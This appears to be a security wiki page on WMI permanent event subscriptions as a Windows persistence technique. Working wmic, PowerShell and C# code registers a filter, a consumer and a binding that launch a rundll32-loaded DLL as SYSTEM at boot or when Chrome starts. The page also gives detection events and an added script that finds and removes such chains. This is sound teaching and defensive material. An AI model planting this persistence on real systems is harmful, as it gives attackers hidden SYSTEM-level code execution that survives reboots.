# WMI events

## WMI events <a href="#h1-wmi" id="h1-wmi"></a>

A WMI event is a notification raised when the state of a specific object changes. The intrinsic event classes cover creation (`__InstanceCreationEvent`), modification (`__InstanceModificationEvent`) and deletion (`__InstanceDeletionEvent`) of instances. A permanent event subscription lives in the `root\subscription` namespace and is made of three objects: an `__EventFilter` holding the WQL query, an event consumer (here `CommandLineEventConsumer`) holding the action to run, and a `__FilterToConsumerBinding` tying the two together. They can be created with wmic, the PowerShell WMI cmdlets or `System.Management`. Writing to `root\subscription` requires administrator rights, and the consumer is executed by the WMI provider host (WmiPrvSE.exe) as SYSTEM, which is what makes this a persistence technique. Defenders can enumerate the same three classes in `root\subscription`; on current Windows builds the `Microsoft-Windows-WMI-Activity/Operational` log records new permanent consumers as event 5861, and Sysmon logs filter, consumer and binding creation as events 19, 20 and 21.

## Exploitation code <a href="#h1-u5229u7528u4ee3u7801" id="h1-u5229u7528u4ee3u7801"></a>

Command line (note that wmic is deprecated in current Windows 10/11 builds and may be absent; the PowerShell and C# variants below do the same thing):

```
# Register an event filter that fires when system uptime is between 120 and 150 seconds
# (2 to 2.5 minutes after boot). The 30-second window is wider than the 20-second WITHIN
# polling interval, so the filter fires at least once per boot. Because this is a permanent
# WMI event subscription it needs administrator rights to create, and the consumer runs as SYSTEM.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="TestEventFilter", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
# Register an event consumer holding the command to execute: rundll32 loading the CS DLL
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="TestConsumer2", ExecutablePath="C:\Windows\System32\cmd.exe", CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
# Bind the event filter to the event consumer
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""
```

PowerShell (Windows PowerShell WMI cmdlets; the filter here fires within 5 seconds of a `chrome.exe` process being created):

```
$wmiParams = @{
  NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
  Name           = 'BugSecFilter'
  EventNamespace = 'root\CIMV2'
  QueryLanguage  = 'WQL'
  Query          = "select * from __InstanceCreationEvent  within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
  Name                = 'BugSecConsumer'
  CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
  Filter   = $filterResult
  Consumer = $consumerResult
}
Set-WmiInstance @wmiParams
```

C#:

```csharp
using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
  class Program
  {
    static void Main(string[] args)
    {
      PersistWMI();
    }
    static void PersistWMI()
    {
      ManagementObject myEventFilter = null;
      ManagementObject myEventConsumer = null;
      ManagementObject myBinder = null;
      // Command the consumer runs; the DLL path is the page's sample payload.
      String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
      // WQL trigger: a new Win32_Process named chrome.exe, polled every 5 seconds.
      String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
                           "WHERE TargetInstance ISA \"Win32_Process\" " +
                           "AND TargetInstance.Name = \"chrome.exe\"";
      try
      {
        // Permanent subscriptions live in root\subscription (administrator rights required).
        ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
        // 1. __EventFilter: the query and the namespace it runs against
        ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
        WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
        myEventFilter = wmiEventFilter.CreateInstance();
        myEventFilter["Name"] = "BugSecFilter";
        myEventFilter["Query"] = myEventQuery.QueryString;
        myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
        myEventFilter["EventNameSpace"] = @"\root\cimv2";
        myEventFilter.Put();
        // 2. CommandLineEventConsumer: the action, executed by WmiPrvSE.exe as SYSTEM
        myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
        myEventConsumer["Name"] = "BugSecConsumer";
        myEventConsumer["CommandLineTemplate"] = CommandLine;
        myEventConsumer.Put();
        // 3. __FilterToConsumerBinding: ties filter and consumer together by relative path
        myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
        myBinder["Filter"] = myEventFilter.Path.RelativePath;
        myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
        myBinder.Put();
      }
      catch (Exception e)
      {
        Console.WriteLine(e);
      }
      Console.ReadKey();
    }
  }
}
```
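The three implementations above all leave the same triple (`__EventFilter`, `CommandLineEventConsumer`, `__FilterToConsumerBinding`) in `root\subscription`. The following is an added example, not code from the original page or from the AxelPotato/WMI repository: it walks every binding, resolves both ends, prints the query and the command line that would run, flags consumers that point at user-writable paths or LOLBins, checks the WMI-Activity log for event 5861, and removes a named chain. It uses the Windows PowerShell `Get-WmiObject`/`Remove-WmiObject` cmdlets (same family as the page's `Set-WmiInstance`, not available in PowerShell 7) and must run elevated. The names `BugSecFilter` and `BugSecConsumer` are taken from the page's samples; the suspicious-path regex is an assumption for illustration.

```powershell
# Added example (not from the original page): triage and clean-up of permanent WMI
# event subscriptions. Run from an elevated Windows PowerShell 5.1 prompt.
param(
    [string]$RemoveFilterName   = '',   # e.g. 'BugSecFilter' (name taken from the page's samples)
    [string]$RemoveConsumerName = ''    # e.g. 'BugSecConsumer'
)

$ns = 'root\subscription'

function Get-WmiPersistence {
    # Each persistence chain is one __FilterToConsumerBinding. Its Filter and Consumer
    # properties are relative WMI paths such as __EventFilter.Name="BugSecFilter",
    # which the [wmi] accelerator resolves back to the real objects.
    foreach ($binding in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        $filter   = [wmi]"\\.\${ns}:$($binding.Filter)"
        $consumer = [wmi]"\\.\${ns}:$($binding.Consumer)"

        # What the consumer does depends on its class: CommandLineEventConsumer runs a
        # command line, ActiveScriptEventConsumer runs VBScript/JScript; the remaining
        # classes (log file, NT event log, SMTP) are rarely used for persistence.
        $action = switch ($consumer.__CLASS) {
            'CommandLineEventConsumer'  { "$($consumer.ExecutablePath) $($consumer.CommandLineTemplate)".Trim() }
            'ActiveScriptEventConsumer' { "[$($consumer.ScriptingEngine)] $($consumer.ScriptText)" }
            default                     { "($($consumer.__CLASS))" }
        }

        [pscustomobject]@{
            FilterName     = $filter.Name
            EventNamespace = $filter.EventNamespace
            Query          = $filter.Query
            ConsumerName   = $consumer.Name
            ConsumerClass  = $consumer.__CLASS
            Action         = $action
            # Assumed heuristic: Microsoft's own subscriptions (e.g. the SCM event filter)
            # are legitimate; a consumer pointing at C:\Temp or a user profile, or at a
            # LOLBin such as rundll32, is what the page's samples look like.
            Suspicious     = [bool]($action -match '(?i)\\Temp\\|\\Users\\|rundll32|powershell|mshta|wscript|cscript|regsvr32')
        }
    }
}

function Remove-WmiPersistence {
    param([string]$FilterName, [string]$ConsumerName)
    # Remove the binding first: a filter or consumer on its own never fires,
    # but a binding with both ends present keeps the chain alive.
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object {
            ($FilterName   -and $_.Filter   -like "*Name=`"$FilterName`"*") -or
            ($ConsumerName -and $_.Consumer -like "*Name=`"$ConsumerName`"*")
        } | Remove-WmiObject
    if ($FilterName) {
        Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$FilterName'" | Remove-WmiObject
    }
    if ($ConsumerName) {
        Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -Filter "Name='$ConsumerName'" | Remove-WmiObject
    }
}

# 1. Inventory every chain currently registered on the host.
Get-WmiPersistence | Format-List

# 2. On Windows 10 / Server 2016 and later, the WMI-Activity log records each new permanent
#    consumer registration as event 5861; the message names the consumer and the filter query.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } `
             -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, @{ n = 'Details'; e = { $_.Message -replace '\s+', ' ' } }

# 3. Optionally tear down one chain by name (e.g. -RemoveFilterName BugSecFilter -RemoveConsumerName BugSecConsumer).
if ($RemoveFilterName -or $RemoveConsumerName) {
    Remove-WmiPersistence -FilterName $RemoveFilterName -ConsumerName $RemoveConsumerName
    Write-Host "Removed chain filter='$RemoveFilterName' consumer='$RemoveConsumerName'"
}
```

Run it without parameters to list what is registered; a clean host normally shows only Microsoft's own `SCM Event Log Filter`/`SCM Event Log Consumer` pair. Removing the binding alone already stops execution, but the filter and consumer are removed too so a later re-binding cannot reuse them.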

References:

{% embed url="https://github.com/AxelPotato/WMI" %}

{% embed url="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/kernel/introduction-to-wmi" %}
